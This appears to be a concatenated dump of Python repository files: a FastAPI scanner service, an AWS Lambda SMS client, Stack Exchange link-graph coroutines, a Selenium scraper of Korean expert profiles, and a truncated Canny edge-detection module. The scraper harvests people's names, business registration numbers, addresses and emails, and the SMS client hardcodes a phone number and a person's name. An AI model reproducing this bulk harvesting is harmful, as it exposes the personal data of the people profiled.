from __future__ import absolute_import from fastapi import FastAPI, HTTPException, Depends, Request, status from fastapi.responses import JSONResponse from pydantic import BaseModel import time import os from lib import Scanner, logger import traceback from typing import Optional import sys app = FastAPI() ls, scanners, scanners_set, scanner_name = get_scanner() print(ls, scanners, scanners_set, scanner_name) lock = False last_lock = time.time() LOCK_THRESHOLD = int(os.environ.get('LOCK_THRESHOLD', None)) if os.environ.get('LOCK_THRESHOLD', None) is not None else 3 @app.route('/') @app.route('/list') @app.route('/scan')
31.867925
121
0.586738
from __future__ import absolute_import from fastapi import FastAPI, HTTPException, Depends, Request, status from fastapi.responses import JSONResponse from pydantic import BaseModel import time import os from lib import Scanner, logger import traceback from typing import Optional import sys app = FastAPI() def get_scanner(scanner_name: str = None): ls = Scanner() scanners = ls.getScanners() if scanner_name is None: if scanners is None or len(scanners) == 0: return None, [], {}, None scanner_name = scanners[0] if isinstance(scanner_name, tuple) or isinstance(scanner_name, list): scanner_name = scanner_name[0] try: ls.setScanner(scanner_name) ls.setDPI(300) ls.setPixelType("color") if sys.platform == "win32": ls.close() except Exception as ex: logger.error('Can not set Scanner: {0}'.format(ex)) print('Can not set Scanner: {0}'.format(ex)) return None, scanners, set(scanners), None return ls, scanners, set(scanners), scanner_name ls, scanners, scanners_set, scanner_name = get_scanner() print(ls, scanners, scanners_set, scanner_name) lock = False last_lock = time.time() LOCK_THRESHOLD = int(os.environ.get('LOCK_THRESHOLD', None)) if os.environ.get('LOCK_THRESHOLD', None) is not None else 3 @app.route('/') def ping(request): start_time = time.time() output = { "output": "pong", "code": "SUCCESS", "msg": "SUCCESS", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_200_OK, content=output) @app.route('/list') def list_scanners(request): start_time = time.time() global scanners output = { "output": scanners, "code": "SUCCESS", "msg": "SUCCESS", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_200_OK, content=output) @app.route('/scan') def scanning(request, request_id: Optional[str] = None, scanner_name: Optional[str] = None): start_time = time.time() global ls global lock global scanners global scanners_set global last_lock if lock: if last_lock + LOCK_THRESHOLD < time.time(): lock = False else: output = { 
"request_id": request_id, "output": False, "code": "LOCK", "msg": "The scanner is locking, please wait", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_423_LOCKED, content=output) if scanner_name is not None: if scanner_name not in scanners_set: ls, scanners, scanners_set, scanner_name = get_scanner() if scanner_name not in scanners_set: output = { "request_id": request_id, "output": scanners, "code": "NOT_FOUND", "msg": "Not found scanner {0}".format(scanner_name), "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_409_CONFLICT, content=output) else: if len(scanners) == 0: ls, scanners, scanners_set, scanner_name = get_scanner() if len(scanners) == 0: output = { "request_id": request_id, "output": False, "code": "NO_SCANNER", "msg": "There's no plugin scanners, check your cable", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_422_UNPROCESSABLE_ENTITY, content=output) scanner_name = scanners[0] lock = True last_lock = time.time() try: image = ls.scan(scanner_name=scanner_name, return_type="based64") except Exception as ex: lock = False output = { "request_id": request_id, "error": "Scan Error", "code": "ERROR", "msg": "There's some error when scanner: {0}".format(traceback.format_exc()), "time": time.time() - start_time } ls, scanners, scanners_set, scanner_name = get_scanner() return JSONResponse(status_code=status.HTTP_500_INTERNAL_SERVER_ERROR, content=output) lock = False if image is False or image is None: output = { "request_id": request_id, "error": "Scan Error", "code": "ERROR", "msg": "There's some error when scanner, I doesn't know.", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_500_INTERNAL_SERVER_ERROR, content=output) output = { "request_id": request_id, "output": image, "code": "SUCCESS", "msg": "SUCCESS", "time": time.time() - start_time } return JSONResponse(status_code=status.HTTP_200_OK, content=output)
4,343
0
89
575d58b5390a86bb5b50713c8330c07cdc1503d8
1,841
py
Python
TextClient.py
michaelxiao16/HackGT6
8ea6a16196fa8226792f0ec9c6e2d3e33513ce9e
[ "MIT" ]
null
null
null
TextClient.py
michaelxiao16/HackGT6
8ea6a16196fa8226792f0ec9c6e2d3e33513ce9e
[ "MIT" ]
null
null
null
TextClient.py
michaelxiao16/HackGT6
8ea6a16196fa8226792f0ec9c6e2d3e33513ce9e
[ "MIT" ]
null
null
null
import json import boto3 as boto3 DESTINATION_NUMBER = "4702637816" FIRST_NAME = "Austin" LAST_NAME = "Miles" if __name__ == '__main__': send_grade_change_message()
21.406977
38
0.611624
import json import boto3 as boto3 DESTINATION_NUMBER = "4702637816" FIRST_NAME = "Austin" LAST_NAME = "Miles" def send_grade_change_message(): payload3 = b"""{ "destinationNumber": "4702637816", "firstName": "Austin", "lastName": "Miles", "source": "Grade Change" }""" client = get_boto3_client() client.invoke( FunctionName="CanvasText", InvocationType="Event", Payload=payload3 ) def send_announcement_message(): payload3 = b"""{ "destinationNumber": "4702637816", "firstName": "Austin", "lastName": "Miles", "source": "New Announcement" }""" client = get_boto3_client() client.invoke( FunctionName="CanvasText", InvocationType="Event", Payload=payload3 ) def send_quiz_message(): payload3 = b"""{ "destinationNumber": "4702637816", "firstName": "Austin", "lastName": "Miles", "source": "New Quiz" }""" client = get_boto3_client() client.invoke( FunctionName="CanvasText", InvocationType="Event", Payload=payload3 ) def send_assignment_message(): payload3 = b"""{ "destinationNumber": "4702637816", "firstName": "Austin", "lastName": "Miles", "source": "New Assignment" }""" client = get_boto3_client() client.invoke( FunctionName="CanvasText", InvocationType="Event", Payload=payload3 ) def get_boto3_client(): with open('aws-creds.json') as f: creds = json.load(f) access_key = creds['access_key'] secret = creds['secret_key'] client = boto3.client( 'lambda', aws_access_key_id=access_key, aws_secret_access_key=secret, region_name='us-east-1' ) return client if __name__ == '__main__': send_grade_change_message()
1,548
0
115
01632dfbdb66922b0869d002c262c48492266f05
3,226
py
Python
src/stack_exchange_graph_data/coroutines/links.py
Peilonrayz/stack_exchange_graph_data
d2d8d9f80dba727509f98b31d25e20e1e3824bb3
[ "MIT" ]
null
null
null
src/stack_exchange_graph_data/coroutines/links.py
Peilonrayz/stack_exchange_graph_data
d2d8d9f80dba727509f98b31d25e20e1e3824bb3
[ "MIT" ]
null
null
null
src/stack_exchange_graph_data/coroutines/links.py
Peilonrayz/stack_exchange_graph_data
d2d8d9f80dba727509f98b31d25e20e1e3824bb3
[ "MIT" ]
null
null
null
"""Link coroutine control flow functions.""" import argparse import collections import urllib.parse from typing import DefaultDict, Generator, List, Set from ..helpers.coroutines import coroutine from ..segd import graph @coroutine def handle_links(filter_: Generator, good: Generator) -> Generator: """Send http and id links to correct target.""" while True: orig_id, link, link_type = yield target = filter_ if isinstance(link, str) else good target.send((orig_id, link, link_type)) @coroutine def filter_links(domains: Set[str], target: Generator) -> Generator: """Filter links to links to posts on the provided site.""" while True: orig_id, link, link_type = yield url = urllib.parse.urlparse(link) if url.netloc not in domains: continue segments: List[str] = url.path.split("/") list_ = segments[1] if len(segments) >= 2 else None post_id = segments[2] if len(segments) >= 3 else "" if list_ not in {"questions", "a", "q"}: continue if url.query: try: _, post_id = url.query.split("_", 1) int(post_id) except ValueError: pass try: int(post_id) except (ValueError, TypeError): continue target.send((orig_id, post_id, link_type)) @coroutine def filter_duplicates(target: Generator) -> Generator: """Remove duplicate links from the output.""" link_lookup: DefaultDict[int, DefaultDict[int, Set[graph.LinkType]]] link_lookup = collections.defaultdict(lambda: collections.defaultdict(set)) try: while True: from_node, to_node, link_type = yield link_lookup[from_node][to_node].add(link_type) finally: for from_node, links_to in link_lookup.items(): for to_node, types in links_to.items(): target.send( (from_node, to_node, max(types, key=lambda i: i.value.weight),) ) @coroutine def filter_network_size(arguments: argparse.Namespace, target: Generator,) -> Generator: """ Filter networks that aren't the wanted size. :param arguments: CLI parser arguments that dictate the min and max size. 
""" graph_ = graph.Graph() try: while True: item = yield graph_.add(*item) finally: for network in graph_.get_networks(): if not arguments.min <= len(network) <= arguments.max: continue for node in network: for link in node.links: edge_type = link.type.value target.send( ( node.value, link.target.value, edge_type.weight, edge_type.type, ) ) @coroutine def sheet_prep(target: Generator) -> Generator: """Convert into the format required to be sent to disk.""" target.send("Source;Target;Weight;Type\n") while True: edge = yield target.send(";".join(map(str, edge)) + "\n")
31.019231
88
0.574706
"""Link coroutine control flow functions.""" import argparse import collections import urllib.parse from typing import DefaultDict, Generator, List, Set from ..helpers.coroutines import coroutine from ..segd import graph @coroutine def handle_links(filter_: Generator, good: Generator) -> Generator: """Send http and id links to correct target.""" while True: orig_id, link, link_type = yield target = filter_ if isinstance(link, str) else good target.send((orig_id, link, link_type)) @coroutine def filter_links(domains: Set[str], target: Generator) -> Generator: """Filter links to links to posts on the provided site.""" while True: orig_id, link, link_type = yield url = urllib.parse.urlparse(link) if url.netloc not in domains: continue segments: List[str] = url.path.split("/") list_ = segments[1] if len(segments) >= 2 else None post_id = segments[2] if len(segments) >= 3 else "" if list_ not in {"questions", "a", "q"}: continue if url.query: try: _, post_id = url.query.split("_", 1) int(post_id) except ValueError: pass try: int(post_id) except (ValueError, TypeError): continue target.send((orig_id, post_id, link_type)) @coroutine def filter_duplicates(target: Generator) -> Generator: """Remove duplicate links from the output.""" link_lookup: DefaultDict[int, DefaultDict[int, Set[graph.LinkType]]] link_lookup = collections.defaultdict(lambda: collections.defaultdict(set)) try: while True: from_node, to_node, link_type = yield link_lookup[from_node][to_node].add(link_type) finally: for from_node, links_to in link_lookup.items(): for to_node, types in links_to.items(): target.send( (from_node, to_node, max(types, key=lambda i: i.value.weight),) ) @coroutine def filter_network_size(arguments: argparse.Namespace, target: Generator,) -> Generator: """ Filter networks that aren't the wanted size. :param arguments: CLI parser arguments that dictate the min and max size. 
""" graph_ = graph.Graph() try: while True: item = yield graph_.add(*item) finally: for network in graph_.get_networks(): if not arguments.min <= len(network) <= arguments.max: continue for node in network: for link in node.links: edge_type = link.type.value target.send( ( node.value, link.target.value, edge_type.weight, edge_type.type, ) ) @coroutine def sheet_prep(target: Generator) -> Generator: """Convert into the format required to be sent to disk.""" target.send("Source;Target;Weight;Type\n") while True: edge = yield target.send(";".join(map(str, edge)) + "\n")
0
0
0
68b34ecd7f5ec5322690ac437666c06998f402ae
11,621
py
Python
Project01/Final/profile_data_extraction.py
nayeem990/Korean-website-scraping
fd26c913bec3a2ba27ca9e8413a9e92bfc618f85
[ "Apache-2.0" ]
null
null
null
Project01/Final/profile_data_extraction.py
nayeem990/Korean-website-scraping
fd26c913bec3a2ba27ca9e8413a9e92bfc618f85
[ "Apache-2.0" ]
null
null
null
Project01/Final/profile_data_extraction.py
nayeem990/Korean-website-scraping
fd26c913bec3a2ba27ca9e8413a9e92bfc618f85
[ "Apache-2.0" ]
null
null
null
# importing the required modules import requests from bs4 import BeautifulSoup import pandas as pd from selenium import webdriver import time pd.options.display.max_columns = 999 pd.options.display.max_rows = 999 df = pd.read_csv('new_profile_links.csv') df = df.drop(['Unnamed: 0'], axis = 1) df["0"] pl = list(df["0"]) all_user = [] for i in range(len(pl)): try: one_user = [] print("Loop :",i) url = pl[i] print(url) driver = webdriver.Chrome(r'C:\Users\David\chromedriver_win32\chromedriver.exe') driver.get(url) time.sleep(3) # basic data extraction basic = [] source_code = driver.page_source soup = BeautifulSoup(source_code, 'html.parser') name = soup.find_all('strong', class_ = 'userName--1ZA07') for n in name: basic.append(n.text) sp = soup.find_all('div', class_ = 'categoryName--1zWtA') category = soup.find_all('strong', class_ = 'introCategory--F81Ky') for e in category: basic.append(e.text) sp = soup.find_all('div', class_ = 'categoryName--1zWtA') for m in sp: basic.append(m.text) rating = soup.find_all('div', class_ = 'itemRating--360UA itemRating--2-rFv typeLarge--1cEMN') for k in rating: a = k.text if "평균 평점" in a: a = a.replace("평균 평점", "") basic.append(a) ### Project data for one user maininfo = [] infos = soup.find_all('ul', class_ = 'productInfoList--1-H-D') for f in infos: li = f.find_all('li') for ll in li: uh = ["대표자","상호명","사업자등록번호","통신판매업번호-", "사업장 주소", "고객센터",'메일'] for u in range(len(uh)): if uh[u] in ll.text: b = uh[u] la = ll.text maininfo.append(la.replace(b , "")) #count product and review section products = [] tt = soup.find_all('div', class_ = "list--e6w5E") for t in tt: cc = t.find_all('div', class_='count--2w5o6') for cd in cc: cd.find_all('div', class_ = "count--2w5o6") ce = cd.text products.append(ce) #profile informations profile = [] heading = soup.find_all('strong', class_ = 'introduceMainTitle--2MZc-') for h in heading: profile.append(h.text) text = soup.find_all('p', class_ = 'introduceText--2R5pY') for e in text: 
profile.append(e.text) #new section recom = soup.find_all('ul', class_ = 'listDisc--1Cc80') for rc in recom: profile.append(rc.text) rest = soup.find_all('div', class_ = ['profileCareer--3_uFh','isExpert--2GkDA']) # for mm in rest: # mm.find_all('div', class_ = 'profileBox--1jlog') for m in rest: m.find_all('div', class_ = "careerJob--2-hX4") for i in m: profile.append(i.text) ### Project data for one user projects = soup.find_all('div', class_ = 'listArea--peDdh') #projects and consultations all_project = [] for y in projects: one = [] yy = y.find_all('div', class_ = 'item--1ZJSx') for t in yy: project_item = [] tdiv = t.find_all('div', class_ =['itemTitle--2vWBq','elip2--nFWXY']) for td in tdiv: project_title = td.text project_item.append(project_title) ratdiv = t.find_all('div', class_ =['itemGroup--2RnIL','ItemGroup_itemGroup--1f-on']) for rd in ratdiv: ratscore = rd.find_all("div", class_ = "itemRating--360UA") for r in ratscore: b = r.text if "평균 평점" in b: b = b.replace("평균 평점", " ") project_item.append(b) ratreview = rd.find_all("div", class_ = "itemCount--2HsJv") for rr in ratreview: c = rr.text if "후기" in c: c = c.replace("후기", " ") project_item.append(c) feediv = t.find_all('span', class_ =['priceInner--1HE2v']) for fd in feediv: fee = fd.find_all("span", class_=["priceNum--1rXJI","ItemPrice_priceNum--2OFHI"]) for f in fee: project_item.append(f.text) discount = fd.find_all("em", class_="discountPercent--3n0bl") for dis in discount: project_item.append(dis.text) actualPrize = fd.find_all("span", class_="beforeDiscount--W1C4G") for fp in actualPrize: project_item.append(fp.text) one.append([*project_item]) all_project.append([*one]) proj = [] for i in range(len(all_project)): data = all_project[i] for j in range(len(data)): dj = data[j] for k in range(len(dj)): bb = dj[k] proj.append(bb) lis = ["평균 평점","후기","판매가","원할인률","할인 전 가격", "할인률"] for i in range(len(proj)): for j in range(len(lis)): if lis[j] in proj[i]: proj[i] = proj[i].replace(lis[j], " ") rdiv = 
soup.find_all('div', class_ = "listSection--kViCl") reviews_user = [] reviews_rating = [] reviews_heading = [] reviews_text = [] for eachr in rdiv: ee = eachr.find_all('div', class_ = "reviewItem--1OwNO") for each in ee: name = each.find_all('span', class_ = ["item--3sQA9 ","nickname--2OOe6"]) for nm in name: reviews_user.append(nm.text) rating = each.find_all('div', class_ = ["expertPoint--2Zrvr","expertPoint--13H3V"]) for r in rating: b = r.text if "평점" in b: b = b.replace("평점", "") reviews_rating.append(b) head = each.find_all('div', class_ = "reviewTitle--qv3Pk") for r in head: reviews_heading.append(r.text) commentdiv = each.find_all('p', class_ = "reviewText--28mzN") for ecom in commentdiv: reviews_text.append(ecom.text) review_obj = [] for i in range(len(reviews_user)): review_obj.append(reviews_user[i]) review_obj.append(reviews_heading[i]) review_obj.append(reviews_rating[i]) review_obj.append(reviews_text[i]) #final works all_user.append([url,*basic, *maininfo, *profile, *products, *review_obj ,*proj]) driver.quit() except : driver.quit() print("Error") try: df = pd.DataFrame(all_user) main = [] for index, row in df.iterrows(): if row[3] in ['법률','노동/노무','지식재산/특허',"등기/공탁/법무",'민원/행정']: main.append("법률") elif row[3] in ['세금/세무','회계/감사','통관/관세','온라인 마케팅','온라인쇼핑몰','엑스퍼트 사업','경영/기술컨설팅','유통관리','가맹점창업','건축','번역/통역','날씨컨설팅','원가 분석']: main.append('비즈니스',) elif row[3] in ['자산컨설팅','부동산 상담','손해사정','신용상담','감정평가']: main.append("금융/재테크") elif row[3] in ['심리상담','영양/다이어트','MBTI ']: main.append("건강") elif row[3] in ['운세/사주','타로카드','작명','꿈해몽','관상','풍수']: main.append("운세") elif row[3] in ['펫 관리','연애','육아','명상','패션/스타일','뷰티','요리/홈쿠킹','커피/주류','인테리어','청소/세탁','교통사고 분석','자동차수리']: main.append("생활") elif row[3] in ['음악/악기','미술/디자인','공예/공방','무용/ 발레','사진','실용/방송댄스','뮤지컬/공연','낚시','원예/홈가드닝','여행','글쓰기/논술']: main.append("취미") elif row[3] in ['외국어학습','입시/진학','해외유학','대학교학습','고등학교학습','중학교학습','초등학교학습']: main.append( '교육/학습') elif row[3] in ['피트니스','골프','필라테스','요가','생활스포츠','자전거','수상 스포츠','동계 
스포츠','유아체육']: main.append('운동/스포츠') elif row[3] in ['게임하우투','IT노하우','코딩','오피스문서','동영상 제작']: main.append('IT/컨텐츠') elif row[3] in ['라이프 코칭','취업','자기PR','공무원시험 ','자격증시험']: main.append('자기계발') else: main.append('네이버고객센터') df.insert(3, "main_category", main) df.to_csv("DATA.csv") except: print("Error occured during data load to pd df") # ######################################### Project data section ######################################## # ## Project data for one user # projects = soup.find_all('div', class_ = 'listArea--peDdh') # #projects and consultations # one = [] # for y in projects: # yy = y.find_all('div', class_ = 'item--1ZJSx') # for t in yy: # project_item = [] # adiv = t.find_all('a', class_ =['itemCard--2Whvq','ItemSmallThumbnail_itemCard--196nY','productCard--1WjeX']) # for div in adiv: # eachdiv = div.find_all('div', class_ =['itemLink--2ljnw']) # for e in eachdiv: # ed = e.find_all('div', class_ =['itemBox--3y657']) # for each in ed: # ee = each.find_all('div', class_ =['itemInfo--24tcX']) # for eee in ee: # title = eee.find_all('div', class_ =['itemTitle--2vWBq','elip2--nFWXY']) # for t in title: # project_item.append([t.text]) # title = project_item[0][0] # print(title) # project_item.append(project_title) # ratdiv = t.find_all('div', class_ =['itemGroup--2RnIL','ItemGroup_itemGroup--1f-on']) # for rd in ratdiv: # each = rd.find_all('div') # for e in each: # project_item.append(e) # feediv = t.find_all('div', class_ = ['itemPrice--cscFn','ItemPrice_itemPrice--1dTfW','alignCenter--2NQfI']) # for fd in feediv: # fee = fd.find_all("span", class_ = ['priceNum--1rXJI','ItemPrice_priceNum--2OFHI']) # for f in fee: # project_item.append(f.text) # one.append([*project_item]) # all_project.append(one) # p = [] # for i in range(len(all_project)): # data = all_project[i] # for j in range(len(data)): # dj = data[j] # for k in range(len(dj)): # bb = dj[k] # p.append(bb)
33.586705
133
0.45435
# importing the required modules import requests from bs4 import BeautifulSoup import pandas as pd from selenium import webdriver import time pd.options.display.max_columns = 999 pd.options.display.max_rows = 999 df = pd.read_csv('new_profile_links.csv') df = df.drop(['Unnamed: 0'], axis = 1) df["0"] pl = list(df["0"]) all_user = [] for i in range(len(pl)): try: one_user = [] print("Loop :",i) url = pl[i] print(url) driver = webdriver.Chrome(r'C:\Users\David\chromedriver_win32\chromedriver.exe') driver.get(url) time.sleep(3) # basic data extraction basic = [] source_code = driver.page_source soup = BeautifulSoup(source_code, 'html.parser') name = soup.find_all('strong', class_ = 'userName--1ZA07') for n in name: basic.append(n.text) sp = soup.find_all('div', class_ = 'categoryName--1zWtA') category = soup.find_all('strong', class_ = 'introCategory--F81Ky') for e in category: basic.append(e.text) sp = soup.find_all('div', class_ = 'categoryName--1zWtA') for m in sp: basic.append(m.text) rating = soup.find_all('div', class_ = 'itemRating--360UA itemRating--2-rFv typeLarge--1cEMN') for k in rating: a = k.text if "평균 평점" in a: a = a.replace("평균 평점", "") basic.append(a) ### Project data for one user maininfo = [] infos = soup.find_all('ul', class_ = 'productInfoList--1-H-D') for f in infos: li = f.find_all('li') for ll in li: uh = ["대표자","상호명","사업자등록번호","통신판매업번호-", "사업장 주소", "고객센터",'메일'] for u in range(len(uh)): if uh[u] in ll.text: b = uh[u] la = ll.text maininfo.append(la.replace(b , "")) #count product and review section products = [] tt = soup.find_all('div', class_ = "list--e6w5E") for t in tt: cc = t.find_all('div', class_='count--2w5o6') for cd in cc: cd.find_all('div', class_ = "count--2w5o6") ce = cd.text products.append(ce) #profile informations profile = [] heading = soup.find_all('strong', class_ = 'introduceMainTitle--2MZc-') for h in heading: profile.append(h.text) text = soup.find_all('p', class_ = 'introduceText--2R5pY') for e in text: 
profile.append(e.text) #new section recom = soup.find_all('ul', class_ = 'listDisc--1Cc80') for rc in recom: profile.append(rc.text) rest = soup.find_all('div', class_ = ['profileCareer--3_uFh','isExpert--2GkDA']) # for mm in rest: # mm.find_all('div', class_ = 'profileBox--1jlog') for m in rest: m.find_all('div', class_ = "careerJob--2-hX4") for i in m: profile.append(i.text) ### Project data for one user projects = soup.find_all('div', class_ = 'listArea--peDdh') #projects and consultations all_project = [] for y in projects: one = [] yy = y.find_all('div', class_ = 'item--1ZJSx') for t in yy: project_item = [] tdiv = t.find_all('div', class_ =['itemTitle--2vWBq','elip2--nFWXY']) for td in tdiv: project_title = td.text project_item.append(project_title) ratdiv = t.find_all('div', class_ =['itemGroup--2RnIL','ItemGroup_itemGroup--1f-on']) for rd in ratdiv: ratscore = rd.find_all("div", class_ = "itemRating--360UA") for r in ratscore: b = r.text if "평균 평점" in b: b = b.replace("평균 평점", " ") project_item.append(b) ratreview = rd.find_all("div", class_ = "itemCount--2HsJv") for rr in ratreview: c = rr.text if "후기" in c: c = c.replace("후기", " ") project_item.append(c) feediv = t.find_all('span', class_ =['priceInner--1HE2v']) for fd in feediv: fee = fd.find_all("span", class_=["priceNum--1rXJI","ItemPrice_priceNum--2OFHI"]) for f in fee: project_item.append(f.text) discount = fd.find_all("em", class_="discountPercent--3n0bl") for dis in discount: project_item.append(dis.text) actualPrize = fd.find_all("span", class_="beforeDiscount--W1C4G") for fp in actualPrize: project_item.append(fp.text) one.append([*project_item]) all_project.append([*one]) proj = [] for i in range(len(all_project)): data = all_project[i] for j in range(len(data)): dj = data[j] for k in range(len(dj)): bb = dj[k] proj.append(bb) lis = ["평균 평점","후기","판매가","원할인률","할인 전 가격", "할인률"] for i in range(len(proj)): for j in range(len(lis)): if lis[j] in proj[i]: proj[i] = proj[i].replace(lis[j], " ") rdiv = 
soup.find_all('div', class_ = "listSection--kViCl") reviews_user = [] reviews_rating = [] reviews_heading = [] reviews_text = [] for eachr in rdiv: ee = eachr.find_all('div', class_ = "reviewItem--1OwNO") for each in ee: name = each.find_all('span', class_ = ["item--3sQA9 ","nickname--2OOe6"]) for nm in name: reviews_user.append(nm.text) rating = each.find_all('div', class_ = ["expertPoint--2Zrvr","expertPoint--13H3V"]) for r in rating: b = r.text if "평점" in b: b = b.replace("평점", "") reviews_rating.append(b) head = each.find_all('div', class_ = "reviewTitle--qv3Pk") for r in head: reviews_heading.append(r.text) commentdiv = each.find_all('p', class_ = "reviewText--28mzN") for ecom in commentdiv: reviews_text.append(ecom.text) review_obj = [] for i in range(len(reviews_user)): review_obj.append(reviews_user[i]) review_obj.append(reviews_heading[i]) review_obj.append(reviews_rating[i]) review_obj.append(reviews_text[i]) #final works all_user.append([url,*basic, *maininfo, *profile, *products, *review_obj ,*proj]) driver.quit() except : driver.quit() print("Error") try: df = pd.DataFrame(all_user) main = [] for index, row in df.iterrows(): if row[3] in ['법률','노동/노무','지식재산/특허',"등기/공탁/법무",'민원/행정']: main.append("법률") elif row[3] in ['세금/세무','회계/감사','통관/관세','온라인 마케팅','온라인쇼핑몰','엑스퍼트 사업','경영/기술컨설팅','유통관리','가맹점창업','건축','번역/통역','날씨컨설팅','원가 분석']: main.append('비즈니스',) elif row[3] in ['자산컨설팅','부동산 상담','손해사정','신용상담','감정평가']: main.append("금융/재테크") elif row[3] in ['심리상담','영양/다이어트','MBTI ']: main.append("건강") elif row[3] in ['운세/사주','타로카드','작명','꿈해몽','관상','풍수']: main.append("운세") elif row[3] in ['펫 관리','연애','육아','명상','패션/스타일','뷰티','요리/홈쿠킹','커피/주류','인테리어','청소/세탁','교통사고 분석','자동차수리']: main.append("생활") elif row[3] in ['음악/악기','미술/디자인','공예/공방','무용/ 발레','사진','실용/방송댄스','뮤지컬/공연','낚시','원예/홈가드닝','여행','글쓰기/논술']: main.append("취미") elif row[3] in ['외국어학습','입시/진학','해외유학','대학교학습','고등학교학습','중학교학습','초등학교학습']: main.append( '교육/학습') elif row[3] in ['피트니스','골프','필라테스','요가','생활스포츠','자전거','수상 스포츠','동계 
스포츠','유아체육']: main.append('운동/스포츠') elif row[3] in ['게임하우투','IT노하우','코딩','오피스문서','동영상 제작']: main.append('IT/컨텐츠') elif row[3] in ['라이프 코칭','취업','자기PR','공무원시험 ','자격증시험']: main.append('자기계발') else: main.append('네이버고객센터') df.insert(3, "main_category", main) df.to_csv("DATA.csv") except: print("Error occured during data load to pd df") # ######################################### Project data section ######################################## # ## Project data for one user # projects = soup.find_all('div', class_ = 'listArea--peDdh') # #projects and consultations # one = [] # for y in projects: # yy = y.find_all('div', class_ = 'item--1ZJSx') # for t in yy: # project_item = [] # adiv = t.find_all('a', class_ =['itemCard--2Whvq','ItemSmallThumbnail_itemCard--196nY','productCard--1WjeX']) # for div in adiv: # eachdiv = div.find_all('div', class_ =['itemLink--2ljnw']) # for e in eachdiv: # ed = e.find_all('div', class_ =['itemBox--3y657']) # for each in ed: # ee = each.find_all('div', class_ =['itemInfo--24tcX']) # for eee in ee: # title = eee.find_all('div', class_ =['itemTitle--2vWBq','elip2--nFWXY']) # for t in title: # project_item.append([t.text]) # title = project_item[0][0] # print(title) # project_item.append(project_title) # ratdiv = t.find_all('div', class_ =['itemGroup--2RnIL','ItemGroup_itemGroup--1f-on']) # for rd in ratdiv: # each = rd.find_all('div') # for e in each: # project_item.append(e) # feediv = t.find_all('div', class_ = ['itemPrice--cscFn','ItemPrice_itemPrice--1dTfW','alignCenter--2NQfI']) # for fd in feediv: # fee = fd.find_all("span", class_ = ['priceNum--1rXJI','ItemPrice_priceNum--2OFHI']) # for f in fee: # project_item.append(f.text) # one.append([*project_item]) # all_project.append(one) # p = [] # for i in range(len(all_project)): # data = all_project[i] # for j in range(len(data)): # dj = data[j] # for k in range(len(dj)): # bb = dj[k] # p.append(bb)
0
0
0
19fc44400262a2a3e22b403b44260ab7e740721d
6,183
py
Python
augmentation/edge_detection/canny_edge.py
mnguyen0226/image-augmentation-dnn-performance
793b0e513a6984d13e5ae33e1dd74fb8c45556fd
[ "MIT" ]
null
null
null
augmentation/edge_detection/canny_edge.py
mnguyen0226/image-augmentation-dnn-performance
793b0e513a6984d13e5ae33e1dd74fb8c45556fd
[ "MIT" ]
null
null
null
augmentation/edge_detection/canny_edge.py
mnguyen0226/image-augmentation-dnn-performance
793b0e513a6984d13e5ae33e1dd74fb8c45556fd
[ "MIT" ]
null
null
null
import math import cv2 as cv import numpy as np from scipy.ndimage.filters import convolve from scipy import ndimage from matplotlib import pyplot as plt import matplotlib.image as mpimg def get_sobel_kernel(im): """Takes in smoothed images then do matrix multiplication with Sobel kernel to get the gradient magnitude and angle Parameters ---------- im input image Returns ------- gradient gradient magnitude of sobel filter theta the angle of sobel filter """ kernel_x = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]], np.float32) kernel_y = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]], np.float32) image_x = ndimage.filters.convolve(im, kernel_x) image_y = ndimage.filters.convolve(im, kernel_y) gradient = np.hypot(image_x, image_y) gradient = gradient / gradient.max() * 255 theta = np.arctan2(image_y, image_x) return (gradient, theta) def non_max_supression(grad_im, theta): """Goes thru all points on the gradient intensity matrix to finds the pixels with the max value in the edge directions Parameters ---------- grad_im gradient magnitude from sobel filter theta angle from sobel filter Returns ------- out_im output image """ row, col = grad_im.shape # M, N out_im = np.zeros((row, col), dtype=np.int32) angle = theta*180. 
/ np.pi angle[angle < 0] += 180 for i in range(1,row-1): for j in range(1,col-1): q = 255 r = 255 # for angle 0 if (0 <= angle[i,j] < 22.5) or (157.5 <= angle[i,j] <= 180): q = grad_im[i, j+1] r = grad_im[i, j-1] # for angle 45 elif (22.5 <= angle[i,j] < 67.5): q = grad_im[i+1, j-1] r = grad_im[i-1, j+1] # for angle 90 elif (67.5 <= angle[i,j] < 112.5): q = grad_im[i+1, j] r = grad_im[i-1, j] # for angle 135 elif (112.5 <= angle[i,j] < 157.5): q = grad_im[i-1, j-1] r = grad_im[i+1, j+1] if (grad_im[i,j] >= q) and (grad_im[i,j] >= r): out_im[i,j] = grad_im[i,j] else: out_im[i,j] = 0 return out_im def double_threshold(im, ltr, htr): """Double threshold aim to identify strong, weak, and non-relevant pixels Parameters ---------- im input image ltr low threshold ratio htr high threshold ratio Returns ------- weak weak pixel that has intensity value that is not enough to be considered strong ones, but not non-relevant strong pixel with very high intensity res non-relevant pixel, not high, not low """ high_thres = im.max() * htr low_thres = high_thres * ltr row, col = im.shape res = np.zeros((row,col), dtype=np.int32) weak = np.int32(25) strong = np.int32(255) strong_i, strong_j = np.where(im >= high_thres) zeros_i, zeros_j = np.where(im < low_thres) weak_i, weak_j = np.where((im <= high_thres) & (im >= low_thres)) res[strong_i, strong_j] = strong res[weak_i, weak_j] = weak return (res, weak, strong) def hysteresis(im, weak, strong=255): """Transforms weak pixel into strong ones if at least 1 pixel around the one being processed is a strong one Parameters ---------- im input image weak weak pixel that has intensity value that is not enough to be considered strong ones, but not non-relevant strong pixel with very high intensity Returns ------- im output result image """ row, col = im.shape for i in range(1, row-1): for j in range(1, col-1): if (im[i,j] == weak): if ((im[i+1, j-1] == strong) or (im[i+1, j] == strong) or (im[i+1, j+1] == strong) or (im[i, j-1] == strong) or 
